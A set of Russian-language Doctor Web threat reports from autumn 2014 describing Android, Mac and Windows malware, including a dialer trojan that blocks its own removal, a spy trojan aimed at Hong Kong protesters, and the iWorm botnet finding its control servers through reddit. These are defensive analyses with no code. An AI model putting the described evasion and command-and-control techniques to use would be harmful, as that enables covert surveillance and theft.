27 октября 2014 года

Специалисты компании «Доктор Веб» обнаружили троянца-дозвонщика, который заражает мобильные устройства под управлением ОС Android и обладает серьезным механизмом самозащиты. Вредоносные программы, совершающие дорогостоящие звонки без согласия пользователя, известны давно: подобные угрозы были широко распространены в эпоху медленного интернет-соединения по технологии dial-up, когда связь осуществлялась с использованием модемов, а позднее нередко атаковали и мобильные устройства. Основная задача таких вредоносных программ – установить соединение с определенным телефонным номером (в большинстве случаев принадлежащим развлекательному сервису категории «для взрослых»), за что с абонентского счета жертвы списывается внушительная сумма, поступающая в карман злоумышленников. В настоящее время подобные программы встречаются не так часто, однако все еще используются мошенниками для получения незаконного заработка.

Новый Android-троянец, добавленный специалистами компании «Доктор Веб» в вирусную базу под именем Android.Dialer.7.origin, представляет собой классическую вредоносную программу-дозвонщик, совершающую звонки на премиум-номера. Троянец распространяется злоумышленниками под видом эротического приложения и после установки помещает на главный экран мобильного устройства свой ярлык, который не имеет подписи и значка, в результате чего у некоторых пользователей может сложиться ложное впечатление о том, что установка программы не удалась. В ряде случаев после запуска Android.Dialer.7.origin может продемонстрировать сообщение об ошибке доступа к запрошенной услуге, после чего окончательно скрывает следы своего пребывания в зараженной системе, удаляя созданный ранее ярлык и функционируя в дальнейшем в качестве системного сервиса. Помимо ручного запуска через ярлык, троянец активирует данный сервис автоматически, например, после очередного включения зараженного устройства, поэтому фактически для начала вредоносной деятельности не требуется никакого вмешательство пользователя.

Запускаемый Android.Dialer.7.origin сервис с определенной периодичностью осуществляет звонки на номер 803402470, информация о котором хранится в настройках троянца. Однако при необходимости киберпреступники могут изменить целевой номер дозвона, отдав вредоносному приложению соответствующую команду с управляющего сервера, – это увеличивает функциональную гибкость Android.Dialer.7.origin и позволяет его авторам заработать сразу на нескольких платных сервисах.

Чтобы уменьшить вероятность обнаружения пользователем нежелательной активности, троянец отключает разговорный динамик мобильного устройства на время «телефонного разговора», а для окончательного сокрытия вредоносной деятельности удаляет из системного журнала, а также из списка совершенных звонков всю компрометирующую его информацию.

Однако главной особенностью этого дозвонщика является его способность противостоять попыткам пострадавшего пользователя удалить угрозу с зараженного мобильного устройства: как только жертва откроет раздел системных настроек, отвечающий за управление приложениями, Android.Dialer.7.origin заблокирует это действие, переведя пользователя на главный экран операционной системы. Таким образом, ручное удаление троянца становится практически невозможным.

Антивирусные продукты компании «Доктор Веб» детектируют и успешно удаляют данного троянца с защищаемых ими мобильных устройств, поэтому пользователи Антивируса Dr.Web для Android и Антивируса Dr.Web для Android Light надежно защищены от этой угрозы. Если вы испытываете затруднения при удалении Android.Dialer.7.origin, воспользуйтесь встроенной в антивирус функцией аварийной разблокировки устройства, после чего повторите процедуру сканирования и лечения.

Защитите ваше Android-устройство с помощью Dr.Web

http://feedproxy.google.com/~r/drweb/viruses/~3/zJCP6kI3hH4/

6 октября 2014 года

В конце сентября компания «Доктор Веб» сообщала о распространении троянской программы Trojan.SteamBurglar.1, воровавшей игровые предметы у пользователей Steam, в частности, у многочисленных поклонников игры Dota 2. К настоящему моменту специалистам «Доктор Веб» известно уже несколько десятков модификаций этого вредоносного приложения, однако арсенал злоумышленников, стремящихся нажиться на любителях массовых многопользовательских ролевых игр (MMORPG), не ограничивается только лишь распространением троянцев. В этой заметке мы расскажем о способах мошенничества, применяемых злоумышленниками против поклонников различных игровых платформ.

Известно, что современные многопользовательские игры — это целые виртуальные миры со своими традициями, историей, культурой и даже своеобразной экономической моделью, позволяющей покупать и продавать как отдельные виртуальные предметы, так и целых персонажей, «прокачанных» игроком до определенного уровня. Одной из наиболее распространенных игр данной категории является знаменитая ролевая стратегия World Of Warсraft, разработку и поддержку которой осуществляет компания Blizzard Entertainment. Нужно отметить, что купля-продажа персонажей прямо запрещена правилами большинства многопользовательских игр, администрация которых активно борется с данным явлением. Так, после выхода одного из обновлений World Of Warсraft ее создатели попытались положить конец торговле учетными записями, анонсировав услугу платной «прокачки» персонажей до 90-го уровня, однако эта мера не принесла должного результата. Приобретая аккаунт на игровом сервере, покупатель стремится получить не просто персонажа с максимальным количеством различных «навыков» и баллов опыта, но также игровую амуницию, доспехи, ездовых животных (иногда довольно редких), набор умений и профессий, доступных для данного героя, иные игровые артефакты и возможности. Чем их больше, тем выше стоимость аккаунта, которая в некоторых случаях может превышать 20 000 рублей.

Основным фактором риска для покупателя персонажей является то, что на большинстве игровых серверов (включая поддерживаемые Blizzard) учетная запись пользователя привязана к его адресу электронной почты, иногда — к телефонному номеру, а в случае блокировки аккаунта администрация сервера может попросить пользователя предоставить паспортные данные. Поэтому выставленный на продажу мошенниками игровой аккаунт может быть возвращен им по первому обращению в службу технической поддержки. Если же выяснится, что учетная запись в нарушение правил была продана, ее просто заблокируют. В любом случае, деньги останутся у злоумышленников, а проблемы — у их жертвы.

Помимо прочего, у потенциального покупателя имеется ненулевой шанс стать обладателем ворованного игрового аккаунта, ранее «угнанного» у другого пользователя. Очень редко злоумышленники воруют учетные записи, намереваясь воспользоваться ими для игры, гораздо чаще это делается с целью наживы. В самом примитивном случае они попытаются просто продать краденый аккаунт, однако только этим возможности теневого заработка в игровых вселенных не ограничиваются: например, мошенники могут перенести все привязанные к аккаунту артефакты на другую учетную запись (с целью последующей реализации, конечно). Новые владельцы украденного аккаунта, воспользовавшись доверием товарищей по игровой гильдии, могут назанимать виртуальных денег или ограбить гильдейский банк. Также злоумышленники с помощью системы личных сообщений могут рассылать от имени игрока фишинговые ссылки — например, публикуя информацию об «акции от разработчика игры», требующей зарегистрироваться на стороннем сайте со своим логином и паролем, или рекламируя программы для накрутки игровых характеристик персонажа, под видом которых распространяются вирусы и троянцы.

Вот почему при приобретении игровых аккаунтов опытные пользователи обычно рекомендуют новичкам принимать определенные меры предосторожности: например, требовать у продавца не только пароль от учетной записи и ответ на секретный вопрос, необходимый для его восстановления, но также полный доступ к почтовому ящику, который «привязан» к этому аккаунту, изображения отсканированных страниц паспорта текущего владельца «учетки» и фото самого владельца с паспортом в руках — предъявить такие фотографии могут потребовать сотрудники службы технической поддержки при возникновении конфликтной ситуации. На практике же случается, что даже подобные шаги помогают далеко не всегда — так, в качестве доказательства подлинности личности владельца учетной записи техподдержка может попросить выслать фотографию не просто с паспортом в руках, но и с подтверждением времени изготовления снимка, например, в кадре должна присутствовать свежая газета. В результате аккаунт отдадут тому, кто сможет предоставить такой кадр, либо просто заблокируют навсегда, если окажется доказанной попытка его продажи. Важно учитывать также и то обстоятельство, что правила использования большинства игровых серверов, которые должен принять пользователь, включают пункты о полном отказе администрации от каких-либо гарантий и о возможности заблокировать любую учетную запись без объяснения причин, что становится сюрпризом для многих игроков, попавших в сложную ситуацию и не удосужившихся заранее ознакомиться с текстом Лицензионного соглашения. Вот почему пользователям популярных игровых платформ следует проявлять осмотрительность и внимательность при совершении виртуальных сделок, а также стараться не нарушать установленные администрацией правила, в частности, касающиеся запрета на куплю-продажу учетных записей.

http://feedproxy.google.com/~r/drweb/viruses/~3/eZy7sXc5umw/

3 октября 2014 года

Многие современные вредоносные программы, работающие на мобильных устройствах, предназначены для незаконного сбора информации и шпионажа за пользователями. Обнаруженный недавно очередной Android-троянец создан именно с этой целью, однако выделяется на фоне большинства подобных угроз не только заложенными в него функциями, но и тем, что атака с его использованием рассчитана на конкретную группу лиц, интересующую злоумышленников. Специалисты компании «Доктор Веб» исследовали эту вредоносную программу, получившую по нашей классификации наименование Android.SpyHK.1.origin.

Новая Android-угроза распространялась среди протестующих жителей Гонконга, выступающих за более демократичную избирательную систему. Троянец устанавливался на мобильные устройства активистов под видом приложения для координации их действий, поэтому не должен был вызвать особых подозрений у большинства своих жертв.

После своего запуска Android.SpyHK.1.origin устанавливает соединение с управляющим сервером, куда загружает большой объем общей информации о зараженном устройстве (например, версию операционной системы, номер телефона, IMEI-идентификатор, аппаратные характеристики и т. п.), после чего ожидает дальнейших указаний злоумышленников. Троянец оснащен обширным функционалом и, в зависимости от поступившей команды, может выполнить следующие действия:

• получить содержимое заданной директории (имена, размеры, даты последних изменений файлов и папок);
• получить GPS-координаты устройства;
• сделать запись в лог-файле;
• отобразить на экране сообщение с заданным текстом;
• выполнить звонок на заданный номер;
• получить информацию об устройстве;
• исполнить заданный shell-скрипт;
• получить расширенный список контактов (включая имя, номер, а также email-адрес);
• получить доступ к СМС-переписке;
• получить историю звонков;
• добавить определенные номера телефонов в список прослушиваемых;
• получить текущий список прослушиваемых номеров;
• загрузить файл с заданного веб-адреса;
• удалить заданный файл с устройства;
• загрузить заданный файл на управляющий сервер;
• активировать диктофонную запись через определенное время;
• активировать диктофонную запись с одновременной ее передачей на сокет управляющего сервера;
• остановить диктофонную запись;
• загрузить на управляющий сервер локальные базы встроенного почтового клиента;
• получить историю веб-бразуера;
• отправить на управляющий сервер информацию о хранящихся на карте памяти файлах и каталогах;
• выполнить сразу несколько команд по сбору конфиденциальной информации и отправить ее на сервер.

Android.SpyHK.1.origin обладает рядом интересных функциональных особенностей, выделяющих его среди прочих троянцев-шпионов. В частности, для определения GPS-координат зараженных мобильных Android-устройств троянец эксплуатирует известную уязвимость системного виджета управления питанием, которая позволяет активировать некоторые функции мобильного устройства в обход глобальных системных настроек. Несмотря на то, что данная уязвимость была устранена еще в 2011 году, некоторые пользователи сообщали о ее повторном появлении в последних версиях операционной системы. Таким образом, в ряде случаев Android.SpyHK.1.origin теоретически может активировать GPS-приемник зараженного смартфона или планшета, даже если владелец устройства запретил использование этой функции в соответствующих настройках.

Кроме этого, осуществляемая шпионом передача диктофонной записи на сокет управляющего сервера позволяет выполнять прослушивание в реальном времени. Такое интересное техническое решение дает альтернативу прослушиванию при помощи скрытого телефонного звонка: в то время, когда передача данных по каналам сотовых сетей может быть заблокирована правоохранительными органами, вероятность доступных и активных Wi-Fi-сетей остается весьма высокой, поэтому у злоумышленников имеется определенный шанс получить необходимую им информацию. Более того, благодаря передаче большей части собираемой троянцем информации непосредственно на сокет удаленного сервера, при достаточно мощных вычислительных ресурсах последнего злоумышленники могут в реальном времени получать оперативную информацию об окружающей обстановке там, где находятся зараженные Android-устройства, объединив инфицированные смартфоны и планшеты в мощную систему слежения.

Все это позволяет говорить о проведении хорошо спланированной таргетированной атаке, направленной на получение важной информации о бастующих в настоящее время жителях Гонконга, а также их возможных действиях в будущем. Нельзя исключать применения этой или аналогичных вредоносных программ и в других регионах мира, поэтому владельцы мобильных устройств должны проявлять осторожность и не устанавливать на свои мобильные устройства подозрительные приложения.

Запись для данного троянца добавлена в вирусные базы, поэтому Android.SpyHK.1.origin не представляет опасности для пользователей антивируса Dr.Web для Android и Dr.Web для Android Light.

Подробнее об угрозе

Защитите ваше Android-устройство с помощью Dr.Web

http://feedproxy.google.com/~r/drweb/viruses/~3/yGtNdKRT9b8/

2 октября 2014 года

Как и в предыдущие месяцы, в сентябре специалисты компании «Доктор Веб» зафиксировали многочисленные атаки на мобильные устройства пользователей. В частности, вирусная база Dr.Web пополнилась множеством новых записей для распространяемых злоумышленниками Android-угроз, среди которых были банковские троянцы, троянцы-вымогатели, вредоносные программы-шпионы и даже опасный троянец-вандал. Также в вирусную базу была внесена очередная запись для вредоносного приложения, работающего на «взломанных» мобильных устройствах производства компании Apple.

Количество и скорость появления новых вредоносных приложений, заражающих мобильные устройства под управлением ОС Android, не перестает удивлять специалистов по информационной безопасности. Во многом интерес со стороны злоумышленников к таким устройствам обусловлен их чрезвычайно широким распространением, а также ресурсами, которые они могут предоставить киберпреступникам. В частности, все больший интерес для сетевых мошенников представляет развивающийся сегмент мобильного онлайн-банкинга, который является для них лакомым куском. В сентябре специалисты компании «Доктор Веб» зафиксировали появление новых представителей банковских троянцев, предназначенных для получения незаконного доступа к счетам пользователей.

Многие из обнаруженных «банковских» угроз предназначались для владельцев Android-смартфонов и планшетов, принадлежащих жителям Южной Кореи. Традиционно большинство банковских Android-троянцев, циркулирующих в этой стране, распространяется злоумышленниками при помощи нежелательных СМС-сообщений, содержащих ссылку на загрузку вредоносного приложения. В сентябре специалисты компании «Доктор Веб» зафиксировали более 100 подобных спам-кампаний, при этом среди наиболее распространенных угроз оказались троянцы Android.Banker.28.origin (22,64%), Android.BankBot.27.origin (21,70%), Android.SmsSpy.78.origin (14,15%), Android.SmsBot.121.origin (11,32%), Android.MulDrop.21.origin (9,43%) и Android.Banker.32.origin (7,55%).

Не остаются в стороне от атак злоумышленников и пользователи из Поднебесной. Среди исследованных в сентябре Android-угроз оказался и очередной троянец-шпион, крадущий конфиденциальную информацию у китайских владельцев мобильных устройств. Эта вредоносная программа, получившая по классификации компании «Доктор Веб» имя Android.Spy.130.origin, опасна тем, что передает контролирующим ее злоумышленникам сведения об СМС-переписке, совершенных звонках, текущих GPS-координатах, а также способна незаметно выполнить звонок на заданный номер, превращая зараженный смартфон или планшет в прослушивающее устройство.

В тренде по-прежнему находятся троянцы, блокирующие мобильные Android-устройства и требующие деньги за их разблокировку, количество этих вымогателей продолжает расти. Среди обнаруженных в прошлом месяце подобных угроз наибольший интерес представляет троянец Android.Locker.38.origin, который помимо блокировки экрана сообщением с требованием оплаты выкупа обзавелся дополнительным инструментом по выманиванию денег у пользователей. Как и его собратья, эта вредоносная программа устанавливается в систему под видом безобидного приложения (в данном случае – якобы системного обновления) и после запуска запрашивает доступ к правам администратора мобильного устройства. Далее Android.Locker.38.origin блокирует его и требует оплату за разблокировку.

При попытке пользователя отозвать у троянца предоставленные ему полномочия вредоносная программа блокирует экран стандартной системной функцией и после его разблокировки угрожает владельцу зараженного Android-смартфона или планшета удалением всей хранящейся на устройстве информации. Если пользователь проигнорирует эту угрозу и отзовет права администратора, Android.Locker.38.origin установит на разблокировку мобильного устройства из режима ожидания собственный пароль, в результате чего для дальнейшей работы может потребоваться сброс всех настроек. Более подробную информацию об этой Android-угрозе можно почерпнуть в соответствующей публикации.

Весьма необычной на фоне прочих Android-троянцев оказалась вредоносная программа Android.Elite.1.origin, которая не предназначалась для извлечения прибыли киберпреступниками. Тем не менее, данная мобильная угроза все же представляла существенную опасность для владельцев Android-устройств. Будучи запущенным на зараженном смартфоне или планшете, Android.Elite.1.origin выполнял форматирование карты памяти, удаляя с нее всю информацию, а также блокировал работу ряда приложений для онлайн-общения и СМС-переписки. Кроме того, этот троянец производил массовую рассылку СМС-сообщений по всем контактам, сохраненным в телефонной книге пользователя, что могло послужить чрезвычайно быстрому опустошению счета мобильного телефона. Подробнее об Android.Elite.1.origin рассказано в соответствующей новостной заметке.

Не забывают киберпреступники и о других мобильных платформах, таких как операционная система iOS от корпорации Apple. В сентябре в вирусную базу компании «Доктор Веб» была внесена запись для одного из компонентов троянца IPhoneOS.PWS.Stealer.2, заражающего мобильные устройства под управлением iOS, которые были подвержены «взлому» самими пользователями с целью расширения их функционала (т. н. jailbreak). Данный троянец, известный с весны текущего года, похищает аутентификационные данные, такие как логины и пароли, которые необходимы для покупки приложений в магазине App Store, в результате чего злоумышленники могут совершать в нем покупки от имени своих жертв, опустошая их карман.

Защитите ваше Android-устройство с помощью Dr.Web

http://feedproxy.google.com/~r/drweb/viruses/~3/CiO7rNG0PFk/

2 октября 2014 года

В сентябре 2014 года специалисты компании «Доктор Веб» обнаружили и исследовали несколько новых угроз для операционной системы Apple Mac OS X. Среди них — сложный бэкдор Mac.BackDoor.iWorm, а также троянец Mac.BackDoor.Ventir.1 и шпион Mac.BackDoor.XSLCmd. Неожиданной атаке подверглись поклонники компьютерных игр: специалисты по информационной безопасности зафиксировали распространение троянских программ семейства Trojan.SteamBurglar, кравших виртуальные игровые предметы у пользователей Steam с целью последующей перепродажи. Традиционно велико количество добавленных в вирусные базы записей для вредоносных программ, ориентированных на операционную систему Microsoft Windows, не снижается интерес вирусописателей и к мобильной платформе Google Android.

Вирусная обстановка

Согласно статистическим данным, собранным в сентябре с использованием лечащей утилиты Dr.Web CureIt!, наиболее часто на компьютерах пользователей обнаруживались надстройки для популярных браузеров, демонстрирующие назойливую рекламу при просмотре веб-страниц, — Trojan.BPlug.123 и Trojan.BPlug.100. Также сканирование дисков при помощи лечащей утилиты нередко выявляло наличие в операционной системе установщика рекламных приложений Trojan.Packed.24524. Эти данные в целом соответствуют показателям за прошлые месяцы.

По данным сервера статистики Dr.Web в сентябре, как и в августе, среди обнаруженных на компьютерах пользователей вредоносных приложений лидирует установщик рекламных программ Trojan.Packed.24524 — он выявляется на инфицированных ПК в 0,66% случаев, при этом данный показатель продолжает расти: в июле отношение числа обнаружений Trojan.Packed.24524 к общему количеству детектированных угроз составляло 0,56%, а в августе — 0,59%. На втором месте в общей статистике расположился бэкдор BackDoor.IRC.NgrBot.42, первые образцы которого были добавлены в вирусные базы Dr.Web еще в 2011 году. Также в сентябрьской статистике высокие показатели по числу обнаружений демонстрируют различные рекламные троянцы, в частности, Trojan.InstallMonster.953, Trojan.Zadved.4 и им подобные.

Что же касается угроз, обнаруженных в почтовом трафике, то в сентябре на уже было утраченные лидирующие позиции вернулся троянец-загрузчик BackDoor.Tishop.122 — число случаев его детектирования за минувшие 30 дней возросло с 1,15 до 1,54%. Второе место с показателем 1,03% заняла модификация этой распространенной угрозы — BackDoor.Tishop.152. Третью и четвертую позиции уверенно заняли троянцы, предназначенные для похищения паролей и иной конфиденциальной информации, — Trojan.PWS.Stealer.4118 и Trojan.PWS.Turist.144. Кроме них в качестве вложений в сообщениях электронной почты активно распространялись другие представители семейства BackDoor.Tishop — BackDoor.Tishop.148 и BackDoor.Tishop.144.

В структуре ботнетнов, отслеживаемых специалистами компании «Доктор Веб», в течение сентября не произошло существенных изменений. Так, в одной из подсетей бот-сети, созданной злоумышленниками с использованием файлового вируса Win32.Rmnet.12, по-прежнему ежесуточно фиксируется порядка 265 000 обращений инфицированных узлов к управляющим серверам, что в целом соответствует августовским показателям. В то же время численность вирусов, действующих в бот-сети Win32.Sector, за минувший месяц немного сократилась: если в августе активность проявляло примерно 65 000 ботов в сутки, то к концу сентября их общее число в среднем составляло 56 000-58 000. А вот популяция Apple-совместимых компьютеров, инфицированных бэкдором BackDoor.Flashback.39, не сокращается: средняя численность этого ботнета в сентябре составила порядка 14 000 зараженных «маков». Кроме того, в сентябре 2014 года специалистами компании «Доктор Веб» был обнаружен новый ботнет, угрожающий пользователям этой платформы, который злоумышленники создали с использованием вредоносной программы Mac.BackDoor.iWorm.

Угрозы для Mac OS X

С того момента, как специалисты компании «Доктор Веб» обнаружили крупнейшую в истории бот-сеть, состоящую из зараженных троянцем BackDoor.Flashback.39 Apple-совместимых компьютеров, прошло уже более двух лет, однако число вредоносных программ для этой платформы не уменьшается. Более того: исследования показывают, что подобные угрозы постепенно становятся все сложнее, расширяются их функциональные возможности, а вирусописатели используют в своих «творениях» самые современные технологии. Интерес злоумышленников к платформе Mac OS X основывается, по всей видимости, на росте популярности этой операционной системы среди пользователей. Так, только в первом осеннем месяце 2014 года вирусные аналитики добавили в базы Dr.Web записи сразу для нескольких опасных программ, угрожающих приверженцам продукции Apple: это троянец-бэкдор Mac.BackDoor.Ventir.1, а также троянец-шпион Mac.BackDoor.XSLCmd, который злоумышленники портировали под Mac OS X, взяв за основу вредоносную программу для Windows. Угрозе заражения этой вредоносной программой подвержены устройства с версиями Mac OS X, выпущенными до октября 2013 года (т. е. 10.8 и старше). Ссылки на скачивание вредоносных Java-скриптов, загружающих на Apple-совместимый компьютер Mac.BackDoor.XSLCmd, злоумышленники размещали внутри блоков кода Google Analytics — бесплатного сервиса, предназначенного для сбора детальной статистики посещения сайтов. Помимо стандартного шпионского функционала, Mac.BackDoor.XSLCmd позволял фиксировать на инфицированном «маке» нажатия клавиш и передавал злоумышленникам снимки экрана.

Однако особый интерес для специалистов по информационной безопасности представляет вредоносная программа Mac.BackDoor.iWorm, с использованием которой злоумышленники создали активно действующий ботнет. Этот троянец способен выполнять на зараженном «маке» различные команды — например, команду на определение версии ОС, получение версии и уникального идентификатора бота, отправку GET-запроса, скачивание файла, открытие сокета для входящего соединения с последующим выполнением приходящих команд, выполнение системной команды, выполнение вложенного скрипта на языке Lua и некоторых других. Примечательно, что этот очень сложный троянец, активно использующий в процессе своей работы криптографию, обращался за списком адресов управляющих серверов к поисковому сервису сайта reddit.com, указывая в качестве запроса шестнадцатеричные значения первых 8 байт хэш-функции MD5 от текущей даты. По результатам поиска reddit.com отдает веб-страницу со списком управляющих серверов ботнета и портов, которые злоумышленники публикуют в виде комментариев к теме minecraftserverlists от имени пользователя vtnhiaovyd:

Троянец пытается установить соединение с командными серверами, перебирая в случайном порядке первые 29 адресов из полученного списка и отправляя запросы на каждый из них. Повторные запросы к сайту reddit для получения нового перечня отправляются раз в 5 минут. Более подробную информацию об этой вредоносной программе и особенностях ее работы можно почерпнуть из опубликованной на сайте компании «Доктор Веб» новостной статьи или детального технического обзора.

Анализ статистики, собранной специалистами компании «Доктор Веб» при исследовании данного ботнета, показывает, что на 30 сентября 2014 года в бот-сети насчитывалось всего 19 888 уникальных IP-адресов, из них 5130 (25.8%) приходится на долю США, 1417 (7.1%) территориально относится к Великобритании, а 1354 (6.8%) – к Канаде. Географическое распределение бот-сети Mac.BackDoor.iWorm по состоянию на конец сентября 2014 года показано на следующей иллюстрации:

Троянец для игроманов

В начале сентября специалисты компании «Доктор Веб» добавили в вирусные базы информацию о вредоносной программе Trojan.SteamBurglar.1, предназначенной для кражи игровых предметов у пользователей платформы Steam. Эта платформа, представляющая собой популярный сервис распространения компьютерных игр, принадлежит компании Valve и позволяет пользователям загружать из Интернета игровые приложения, активировать их, получать обновления и знакомиться с различными новостями игрового мира. Trojan.SteamBurglar.1 распространялся злоумышленниками путем рассылки сообщений в чате Steam или на специализированных форумах с предложением посмотреть скриншоты виртуального оружия или иных ресурсов, представленных якобы для продажи или обмена. Троянец демонстрировал на экране компьютера потенциальной жертвы изображения различных игровых предметов и в это же самое время отыскивал в памяти процесс steam.exe, извлекал из него информацию об игровых артефактах, выявлял среди них наиболее ценные по ключевым словам rare, immortal, legendary, и т. д., после чего осуществлял их кражу с целью последующей продажи. Украденные артефакты пересылались на одну из принадлежащих злоумышленникам учетных записей:

В частности, от действия троянца Trojan.SteamBurglar.1 пострадало некоторое количество игроков популярной многопользовательской игры Dota 2. Получить более подробную информацию об этой угрозе можно, ознакомившись с опубликованной компанией «Доктор Веб» информационной статьей, посвященной данному троянцу. В настоящий момент известно уже о нескольких десятках представителей этого семейства вредоносных программ.

События сентября

Прочие события первого осеннего месяца показали, что вирусописатели не теряют энтузиазма в создании вредоносного ПО: в атаках на компьютеры и мобильные устройства использовались и новые разработки, и усовершенствованные версии известных вредоносных программ, и вредоносные модификации коммерческих приложений.

Второй месяц подряд заражает компьютеры пользователей из Австралии и Великобритании новый тронец-энкодер Trojan.Encoder.761, требуя за расшифровку 350 фунтов стерлингов. Аппетиты другой «новинки» — шифровальщика Trojan.Encoder.759 — несколько скромнее: он просит у своих жертв порядка $100, однако в случае просрочки платежа сумма выкупа возрастает каждые 24 часа. Оба энкодера предлагают жертвам оплатить расшифровку с помощью криптовалюты Bitcoin.

Доступ к системам дистанционного банковского обслуживания (ДБО) также состоит в ряду приоритетных целей злоумышленников. Причем наиболее часто они организуют атаки на клиентскую часть системы, как на менее защищенную сторону в системе банк-клиент. Чтобы скрыть присутствие вредоносного ПО на зараженном ПК, вирусописатели используют модифицированные версии легальных программ, в которые включен вредоносный функционал. Стали известны подробности атаки, в которой была задействована вредоносная версия легальной программы Program.RemoteAdmin, обеспечивающей удаленное управление компьютером. С ее помощью злоумышленники загружали на целевую систему банковского троянца и кейлоггера, после чего беспрепятственно составляли и отправляли в банк платежное поручение для перечисления средств со счета жертвы на свой счет.

В сентябре злоумышленники использовали новую версию троянца BlackEnergy для сбора данных с жестких дисков компьютерных систем государственных и частных компаний, в основном из Польши и Украины. Его первая модификация, проанализированная еще в 2007 году, была разработана для организации относительно простых DDoS-атак. К настоящему времени тривиальный DDoS-троянец превратился в сложную вредоносную программу с модульной архитектурой, позволяющей злоумышленникам менять его функционал в зависимости от поставленных целей. Новые модификации BlackEnergy детектируются антивирусом Dr.Web как Trojan.Siggen6.19887 и BackDoor.BlackEnergy.73.

В сентябре в вирусные базы была добавлена очередная запись для вредоносной программы IPhoneOS.PWS.Stealer.2, способной атаковать мобильные устройства под управлением iOS, подвергшиеся процедуре Jailbreak. Первые ее образцы были выявлены в мае 2014 года. Троянец похищает логины и пароли, необходимые для покупки приложений в App Store. Предполагается, что IPhoneOS.PWS.Stealer.2 попадает на устройство при скачивании программ-оптимизаторов (твиков) из Cydia Substrate или программ, используемых для Jailbreak. IPhoneOS.PWS.Stealer.2 загружает и устанавливает на зараженное устройство поддельную утилиту, позволяющую злоумышленнику без ведома пользователя заходить в App Store и покупать приложения.

В самом конце сентября были выявлены бэкдоры, атакующие Linux-устройства, — Linux.BackDoor.Shellshock.1 и Linux.BackDoor.Shellshock.2. Злоумышленники разработали их под уязвимость ShellShock (или CVE-2014-7169), позволяющую выполнять произвольные команды на инфицированных устройствах, операционные системы которых основаны на ядре Linux и имеют в своем составе оболочку Bash (например, CentOS, Debian, Redhat, Ubuntu). Такими устройствами могут быть серверы, модемы, роутеры, камеры наблюдения, а также множество других подключенных к Интернету аппаратных средств со встроенными операционными системами, причем ПО для многих из них практически не обновляется. Уязвимости ShellShock был присвоен максимальный уровень опасности.

Угрозы для Android

В прошедшем сентябре вирусная база компании «Доктор Веб» пополнилась множеством новых записей для различных вредоносных программ, предназначенных для работы на мобильных Android-устройствах. Среди них – очередной троянец-блокировщик, получивший имя Android.Locker.38.origin. Как и большинство его собратьев, этот вымогатель блокирует экран зараженного мобильного устройства и требует выкуп за его разблокировку, однако помимо этого троянец способен дополнительно заблокировать Android-смартфон или планшет паролем, что значительно затрудняет борьбу с данной угрозой. Подробнее об Android.Locker.38.origin рассказано в новостной публикации на сайте компании «Доктор Веб».

Существенное число обнаруженных в сентябре вредоносных приложений для ОС Android составили новые модификации банковских троянцев, при этом немалая их часть использовалась для проведения очередных атак на южнокорейских пользователей с применением СМС-спама. В общей сложности специалистами компании «Доктор Веб» было выявлено более 100 спам-кампаний, направленных на распространение различных вредоносных Android-программ в Южной Корее, при этом самыми «популярными» троянцами стали Android.Banker.28.origin, Android.BankBot.27.origin, Android.SmsBot.121.origin, Android.SmsSpy.78.origin, Android.Banker.32.origin и Android.MulDrop.21.origin.

Не обошлось и без очередной угрозы для китайских пользователей. В сентябре специалистами компании «Доктор Веб» была обнаружена троянская программа-шпион, добавленная в вирусную базу под именем Android.Spy.130.origin. Это вредоносное приложение крадет у пользователей различную конфиденциальную информацию, такую как СМС-сообщения, данные о совершенных звонках, GPS-координатах, также эта программа способна незаметно выполнить звонок на заданный номер, фактически превращая зараженный смартфон или планшет в прослушивающее устройство.

Обнаруженный в конце месяца мобильный троянец Android.Elite.1.origin оказался полной противоположностью большинству других Android-угроз. В отличие от них, Android.Elite.1.origin не предназначался для незаконного заработка или кражи ценных сведений пользователей, однако, несмотря на это, он все же представлял серьезную опасность. Попадая на мобильное устройство, этот троянец форматировал подключенную к нему карту памяти, а также препятствовал нормальной работе целого ряда приложений. Кроме того, вредоносная программа выполняла массовую рассылку СМС-сообщений, что могло привести к полной потере денежных средств на счете мобильного телефона жертвы. Более подробную информацию об этой угрозе можно получить, прочитав соответствующую публикацию на сайте компании «Доктор Веб».

Полезные ссылки

• Актуальная статистика по вирусным угрозам
• Пробные версии антивирусных программ Dr.Web
  • для дома
  • для бизнеса
• Наши новости
• Вирусная энциклопедия

Давайте дружить! Присоединяйтесь к нашим группам в социальных сетях:

http://feedproxy.google.com/~r/drweb/viruses/~3/AbaPEqNUx98/

30 сентября 2014 года

На заре становления массового рынка персональных компьютеров большинство вредоносных программ создавалось с целью развлечения или бахвальства, а не для получения материальной выгоды. Однако постепенно интерес вирусописателей все больше смещался в сторону незаконного заработка, и в настоящее время среди огромного числа распространяемых информационных угроз сложно встретить троянца, который создавался бы с иной целью. Тем интереснее для вирусных аналитиков компании «Доктор Веб» было получить в свое распоряжение такую редкую и необычную угрозу, которая, ко всему прочему, предназначена для работы не на компьютерах, а на смартфонах и планшетах под управлением ОС Android. Вместе с тем, несмотря на всю свою академическую ценность, новая вредоносная программа представляет для пользователей весьма серьезную опасность, т. к. она удаляет все имеющиеся на карте памяти данные, не позволяет прочитать входящие СМС-сообщения, а также мешает нормальному общению в популярных программах-мессенждерах, блокируя их окна.

Новый Android-троянец, внесенный в вирусную базу компании «Доктор Веб» под именем Android.Elite.1.origin, является представителем весьма редкого типа вредоносных программ, относящихся к классу программ-вандалов. Такие вредоносные приложения обычно создаются вирусописателями не для получения каких-либо материальных выгод, а для доказательства своих навыков программирования, выражения своей точки зрения на те или иные события, либо с целью развлечения или хулиганства. Очень часто подобные угрозы демонстрируют различные сообщения, портят пользовательские файлы и мешают нормальной работе зараженного оборудования. Именно так и действует новый Android-троянец, который распространяется под видом популярных приложений, таких, например, как игры.

При запуске Android.Elite.1.origin обманным путем пытается получить доступ к функциям администратора мобильного устройства, которые якобы необходимы для завершения корректной установки приложения. В случае успеха троянец приступает к немедленному форматированию подключенной SD-карты, удаляя все хранящиеся на ней данные. После этого вредоносная программа ожидает запуска ряда популярных приложений для общения.

Как только пользователь попытается запустить официальный клиент социальной сети Facebook, программу WhatsApp Messenger, Hangouts, либо стандартное системное приложение для работы с СМС-сообщениями, Android.Elite.1.origin блокирует их активное окно, демонстрируя на экране изображение с текстом OBEY or Be HACKED. При этом данная блокировка сохраняется только для указанных программ и не распространяется на прочие приложения или операционную систему в целом.

Чтобы еще больше ограничить доступ пользователя к инструментам «мобильного» общения, троянец препятствует прочтению всех вновь поступающих СМС-сообщений, для чего скрывает от своей жертвы все оповещения о новых СМС. В то же время сами сообщения сохраняются и заботливо помещаются в раздел «Входящие», который, впрочем, остается недоступным из-за действующей блокировки.

